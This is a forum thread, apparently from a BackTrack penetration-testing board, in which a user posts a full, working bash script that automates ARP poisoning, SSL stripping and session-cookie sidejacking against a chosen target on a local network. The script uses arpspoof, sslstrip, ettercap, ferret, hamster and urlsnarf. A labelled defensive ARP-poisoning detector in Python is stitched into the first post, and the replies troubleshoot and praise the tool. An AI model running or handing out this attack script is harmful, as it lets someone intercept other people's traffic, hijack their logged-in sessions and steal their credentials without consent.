
Thread: Another script for sidejacking..

  1. #1
    Just burned his ISO
    Join Date
    Nov 2010
    Location
    Greece
    Posts
    7

    Another script for sidejacking..

    I know there are other scripts out there that do the same thing but, here is one I made. Perhaps someone else will find it useful. It basically uses hamster, ferret, sslstrip, ettercap, urlsnarf, and arpspoof, although adding your favourite program shouldn't be too difficult.

    I tested it in Backtrack 4 R2. One thing to note is the paths of ferret and hamster are hardcoded because it seems there is a problem with just executing them as is. At least on my R2 installation. You can customize it to suit your own needs, like the xterm window sizes and a few other things.

    Code is here:
    Gorara - sidejackssl.sh

    And here:
    Code:
    #!/bin/bash
    
    # sidejackssl.sh v0.1
    # tested in backtrack 4 R2 environment, run as root.
    # xterm used for window control
    # arpspoof poisons a single victim and gateway
    # ferret and hamster for sidejacking
    # sslstrip for https
    # ettercap for everything else
    # urlsnarf to monitor visited urls
    # firefox needs to be configured with a proxy of 127.0.0.1:1234
    # url for hamster server is http://hamster
    # by gorara
    
    # a few variables (do not change)
    m1="0"					# missing file var m1
    m2="0"					# missing file var m2
    m3="0"					# missing file var m3
    m4="0"					# missing file var m4
    quickclean="0"				# used for quick clean up
    randmac="n"				# default setting do not randomize MAC
    hamsterfile="hamster.txt"		# hamster output file (you can't change it)
    trap 'cleanup' SIGINT SIGTERM		# detect control-c
    
    # a few more variables (change these if required)
    
    # xterm window variables
    x="0"					# x offset value
    y="0"					# y offset value
    width="120"				# width value
    height="7"				# height value
    yoffset="120"				# y offset
    fgcolor="white"				# foreground color
    bgcolor="black"				# background color
    
    # style variables
    warnstyle="[\e[01;38mw\e[00m]"		# warning msgs style
    execstyle="[\e[01;32mx\e[00m]"		# execute msgs style
    infostyle="[\e[01;34mi\e[00m]"		# informational msgs style
    inputstyle="[\e[01;30m?\e[00m]"		# input msgs style
    
    # file variables
    sslstripfile="sslstrip.log"		# sslstrip output file name
    snifffile="sniff-*"			# hamster sniff file wildcard
    etterfile="etter.cap"			# ettercap output cap file
    temp="/tmp"				# temporary dir
    
    function usage
    {
    	clear
    	echo "Usage: bash $0 -i interface -t target -g gateway [-r] [-h]"
    	echo ""
    	echo "	-i interface	interface to use, ex. eth0, wlan0."
    	echo "	-t target	the target IP address."
    	echo "	-g gateway	the gateway IP address."
    	echo "	-r		randomize your MAC address,"
    	echo "			only use for wired interfaces."
    	echo "	-h		display this help screen."
    	echo ""
    	echo "	examples: "
    	echo "	 bash $0 -i eth0 -t 192.168.0.1 -g 192.168.0.254 -r"
    	echo "	 bash $0 -i wlan0 -t 192.168.0.1 -g 192.168.0.254"
    	echo ""
    	exit 0
    }
    
    function cleanup() {
    echo -e "\n$warnstyle control-c pressed! "
    
    # exit script if nothing has been modified
    if [[ "$quickclean" = "1" ]]; then
    echo -e "$infostyle nothing changed, all done!"
    exit 0
    fi
    
    echo -e "$infostyle cleaning up..."
    echo -e "$execstyle flushing iptables..."
    iptables -F
    iptables -t nat -F
    
    echo -e "$execstyle turning off IP forwarding..."
    echo "0" > /proc/sys/net/ipv4/ip_forward
    
    # change back MAC address to orignal one
    if [[ "$randmac" = "y" || "$randmac" = "Y" ]]; then
    echo -e "$execstyle resetting MAC address...";
    echo -e "$infostyle original MAC is: $origmac"
    ifconfig $interface down
    ifconfig $interface hw ether $origmac
    ifconfig $interface up
    	if [ -z $gw ]; then
    	echo -e "$warnstyle WARNING, you have no default gateway!"
    	else
    	route add default gw $gw
    	fi
    rm $temp/mac.orig
    rm $temp/gw.orig
    fi
    
    echo -e "$execstyle cleaning up files..."
    echo -e "$infostyle temp directory: "
    
    # testing to see if files exist, if so display them...
    	if [ -f $temp/$sslstripfile ]; then
    	ls $temp/$sslstripfile
    	else
    	#echo -e "$warnstyle missing $sslstripfile"
    	m1="1"
    	fi
    
    	if [ -f $temp/$etterfile ]; then
    	ls $temp/$etterfile
    	else
    	#echo -e "$warnstyle missing $etterfile"
    	m2="1"
    	fi
    
    echo -e "$infostyle current directory: "
    
    	if [ -f $snifffile ]; then
    	ls $snifffile
    	else
    	#echo -e "$warnstyle missing $snifffile"
    	m3="1"
    	fi
    
    	if [ -f $hamsterfile ]; then
    	ls $hamsterfile
    	else
    	#echo -e "$warnstyle missing $hamsterfile"
    	m4="1"
    	fi
    
    # testing to see if there are any files at all
    if [[ $m1 -eq 0 || $m2 -eq 0 || $m3 -eq 0 || $m4 -eq 0 ]]; then
    
    while [[ "$delete" != "y" || "$delete" != "n" ]]
    
    echo -en "$infostyle delete file(s)? [y/n]: " 
    read delete
    
    do
        case "$delete" in
            y) delete_marker="y"; echo -e "$warnstyle deleting files!"; break;;
    	n) echo -e "$warnstyle nothing deleted!"; break;;
        	*) echo -e "$warnstyle wrong selection!";
        esac
    done
    
    # delete files as requested
    if [[ "$delete_marker" = "y" ]]; then
    	if [ -f $temp/$sslstripfile ]; then
    	rm $temp/$sslstripfile
    	fi
    
    	if [ -f $temp/$etterfile ]; then
    	rm $temp/$etterfile
    	fi
    
    	if [ -f $snifffile ]; then
    	rm $snifffile
    	fi
    
    	if [ -f $hamsterfile ]; then
    	rm $hamsterfile
    	fi
    fi
    
    else
    
    	echo -e "$warnstyle nothing to delete!"
    fi
    
    echo -e "$infostyle all done!"
    exit 0
    }
    
    
    # start main program
    if [ "$#" -eq 0 ]; then
    usage
    fi
    
    while [ "$#" -gt 0 ]
    do
        case "$1" in
            -i)  interface=$2; shift 1;;
    	-r)  randmac="y"; shift 1;;
    	-t)  target=$2; shift 1;;
    	-g)  gateway=$2; shift 1;;
    	-h)  usage;;
    	-*)  usage; break;;
    	*)  break;;
        esac
        shift
    done
    
    # required parameters
    if [[ -z $interface || -z $target || -z $gateway ]]; then
    usage
    exit 0
    fi
    
    clear
    
    if [[ "$randmac" = "y" ]]; then
    mac="yes"
    else
    mac="no"
    fi
    
    # set quick cleanup flag
    quickclean="1"
    
    echo -e "$infostyle sidejacker/sslstrip script v0.1, by gorara"
    echo -e "$infostyle ctrl-c to abort at any time."
    echo -e "$infostyle attack summary:"
    echo -e "$infostyle host $target and gateway $gateway from $interface, spoof MAC: $mac"
    
    if [[ "$randmac" = "y" ]]; then 
    
    echo -e "$execstyle change of $interface MAC address requested."
    
    if [[ "$interface" = wlan* || "$interface" = wifi* || "$interface" = ath* ]]; then
    echo -e "$infostyle wireless device detected..." 
    echo -e "$warnstyle can't change MAC address without taking wifi interface down"
    echo -e "$warnstyle do it manually before connecting to the AP."
    exit 0
    fi
    
    if [[ "$interface" = eth* ]]; then
    echo -e "$infostyle wired device detected..." 
    echo -e "$warnstyle WARNING, this will take your wired interface down temporarily."
    echo -en "$inputstyle do you want to continue? [y/n]: "
    read continue
    	if [[ "$continue" = "y" ]]; then
    	echo -e "$infostyle proceeding..."
    	else
    	echo -e "$infostyle exiting..."
    	exit 0	
    	fi
    fi
    
    origmac=`ifconfig $interface | grep HWaddr | awk {'print $5'}`
    
    fi
    
    # before this, ctrl-c will exit script without doing anything.
    quickclean="0"
    
    # use macchanger to randomize MAC address, ect.
    if [[ "$randmac" = "y" || "$randmac" = "Y" ]]; then 
    echo -e "$execstyle randomizing MAC address...";
    gw=`route -n | grep UG | awk {'print $2'}` > $temp/gw.orig
    ifconfig $interface down
    macchanger -r $interface > $temp/mac.orig
    ifconfig $interface up
    	if [ -z $gw ]; then
    	echo -e "$warnstyle WARNING, you have no default gateway!"
    	else
    	route add default gw $gw
    	fi
    origmac=`cat $temp/mac.orig | grep Current | awk {'print $3'}`
    fakemac=`cat $temp/mac.orig | grep Faked | awk {'print $3'}`
    echo -e "$infostyle original MAC is: $origmac"
    echo -e "$infostyle faked    MAC is: $fakemac"
    fi
    
    echo -e "$execstyle turning on IP Forwarding..."
    echo "1" > /proc/sys/net/ipv4/ip_forward
    
    echo -e "$execstyle configuring iptables..."
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    sleep 1
    
    echo -e "$execstyle starting hamster  ... <logging to: $hamsterfile>"
    xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "hamster" -e /pentest/sniffers/hamster/hamster &
    sleep 2
    
    echo -e "$execstyle starting ferret   ... <logging to: console>"
    y=$(($y+$yoffset))
    xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "ferret" -e /pentest/sniffers/hamster/ferret -i $interface &
    sleep 2
    
    echo -e "$execstyle starting sslstrip ... <logging to: $temp/$sslstripfile>"
    y=$(($y+$yoffset))
    xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "sslstrip" -e sslstrip -w $temp/$sslstripfile &
    sleep 2
    
    echo -e "$execstyle starting ettercap ... <logging to: $temp/$etterfile>"
    y=$(($y+$yoffset))
    xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "ettercap" -e ettercap -Tqpi $interface -w $temp/$etterfile /$gateway/ /$target/ &
    sleep 2
    
    echo -e "$execstyle starting urlsnarf ... <logging to: console>"
    y=$(($y+$yoffset))
    xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "urlsnarf" -e urlsnarf -i $interface &
    sleep 2
    
    echo -e "$infostyle trap is ready, now to direct traffic..."
    
    echo -e "$execstyle ARP poisoning the target..."
    y=$(($y+$yoffset))
    xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "arpspoof" -e arpspoof -i $interface -t $target $gateway &
    sleep 1
    
    echo -e "$infostyle run firefox and type http://hamster"
    echo -e "$infostyle don't forget to set proxy to 127.0.0.1:1234"
    echo -e "$infostyle press ctrl-c to exit and clean up... \n"
    for ((;;)) do 
    read loop
    echo -en "$infostyle press ctrl-c to terminate!"
    done
    
    exit 0
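    The script above finishes by pointing arpspoof at the target so that, in the victim's ARP cache, the gateway's IP resolves to the attacking machine's MAC. As an added, defender-side example (not part of the original post or of gorara's script), the following Python shows how that poisoning looks from the victim's side and how to flag it. The /proc/net/arp snapshots, hosts and MAC addresses are constructed; only the gateway address 192.168.0.254 comes from the script's usage text.

```python
from collections import defaultdict

# Constructed sample: a victim's /proc/net/arp before and after poisoning.
# IPs and MACs are made up; 192.168.0.254 is the gateway from the usage text.
BEFORE = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.0.254    0x1         0x2         00:11:22:33:44:55     *        eth0
192.168.0.10     0x1         0x2         aa:bb:cc:dd:ee:01     *        eth0
"""
AFTER = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.0.254    0x1         0x2         aa:bb:cc:dd:ee:99     *        eth0
192.168.0.10     0x1         0x2         aa:bb:cc:dd:ee:01     *        eth0
192.168.0.77     0x1         0x2         aa:bb:cc:dd:ee:99     *        eth0
"""

def parse_arp_table(text):
    """Return {ip: mac} for completed (flags 0x2) entries of a /proc/net/arp dump."""
    table = {}
    for line in text.splitlines()[1:]:  # skip the header row
        fields = line.split()
        if len(fields) < 6 or fields[2] != "0x2":
            continue  # incomplete or stale entry
        table[fields[0]] = fields[3].lower()
    return table

def arp_alerts(snapshots, gateway_ip):
    """Compare successive snapshots and flag the two symptoms a poisoned
    victim shows: the gateway MAC changing, and one MAC owning several IPs
    (the spoofer's real address plus the gateway address it impersonates)."""
    alerts, previous = [], None
    for n, text in enumerate(snapshots):
        table = parse_arp_table(text)
        old, new = (previous or {}).get(gateway_ip), table.get(gateway_ip)
        if old and new and old != new:
            alerts.append(("gateway-mac-changed", n, old, new))
        owners = defaultdict(list)
        for ip, mac in table.items():
            owners[mac].append(ip)
        for mac, ips in owners.items():
            if len(ips) > 1:  # heuristic: multi-homed routers also trip this
                alerts.append(("mac-claims-multiple-ips", n, mac, tuple(sorted(ips))))
        previous = table
    return alerts

if __name__ == "__main__":
    for alert in arp_alerts([BEFORE, AFTER], "192.168.0.254"):
        print(alert)
```

On a real host, feed it the contents of /proc/net/arp read at intervals; a static ARP entry for the gateway, or switch-side dynamic ARP inspection, is the usual mitigation once the alert fires.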

  2. #2
    Junior Member
    Join Date
    Jan 2010
    Posts
    55

    Re: Another script for sidejacking..

    Very slick. Will test tonight and provide feedback. You should start a google code page to track changes.

  3. #3
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    13

    Re: Another script for sidejacking..

    It's not working. I use R2 but I get an error when I run it:

    sh sidejacking.sh

  4. #4
    Administrator sickness's Avatar
    Join Date
    Jan 2010
    Location
    Behind the screen.
    Posts
    2,921

    Re: Another script for sidejacking..

    Quote Originally Posted by Xploit View Post
    It's not working. I use R2 but I get an error when I run it:

    sh sidejacking.sh
    And we are just supposed to know what happened if you don't give us the error message?
    Back|track giving machine guns to monkeys since 2007 !

    Do not read the Wiki, most your questions will not be answered there !
    Do not take a look at the: Forum Rules !

  5. #5
    Member
    Join Date
    Feb 2010
    Location
    MTI3LjAuMC4x
    Posts
    90

    Re: Another script for sidejacking..

    Quote Originally Posted by Xploit View Post
    It's not working. I use R2 but I get an error when I run it:

    sh sidejacking.sh
    I am going to take a guess

    you need to

    chmod +x sidejacking.sh

    (you need to make the script executable)

  6. #6
    Just burned his ISO
    Join Date
    Nov 2010
    Location
    Greece
    Posts
    7

    Re: Another script for sidejacking..

    Quote Originally Posted by spudgunman View Post
    I am going to take a guess

    you need to

    chmod +x sidejacking.sh

    (you need to make the script executable)
    Actually, that's not really required: simply copy-paste the code into a file, save it as sidejackssl.sh (or whatever you want), and run it as such:

    Code:
    bash sidejackssl.sh
    It requires parameters, which the script will show you if you run it like this. You can make it executable and run it as ./sidejackssl.sh if you wish.

  7. #7
    Just burned his ISO
    Join Date
    Nov 2010
    Posts
    4

    Re: Another script for sidejacking..

    root@bt:~# bash sidejackssl.sh
    : command not founde 2:
    : command not founde 14:
    : command not founde 24:
    : command not founde 26:
    : command not founde 35:
    : command not founde 41:
    : command not founde 47:
    'idejackssl.sh: line 49: syntax error near unexpected token `{
    'idejackssl.sh: line 49: `{

    I'm attempting to run this on BT4-R2. I get this error doing it both as "bash sidejackssl.sh" and as "./sidejackssl.sh".

    Just reporting; I'm sorry if the answer is simple and beyond my grasp.

  8. #8
    Junior Member
    Join Date
    Aug 2010
    Posts
    51

    Re: Another script for sidejacking..

    Absolutely brilliant. It works like a bomb. I just need to test the BackTrack Linux - Penetration Testing Distribution proxy but rest of the stuff in the meantime.

    Excellent work

  9. #9
    Just burned his ISO
    Join Date
    Nov 2010
    Posts
    4

    Re: Another script for sidejacking..

    Nice! Worked great for me. Definitely handy dandy and a great script. Thanks!

  10. #10
    Member
    Join Date
    Feb 2010
    Posts
    69

    Re: Another script for sidejacking..

    Well done! Keep it up!
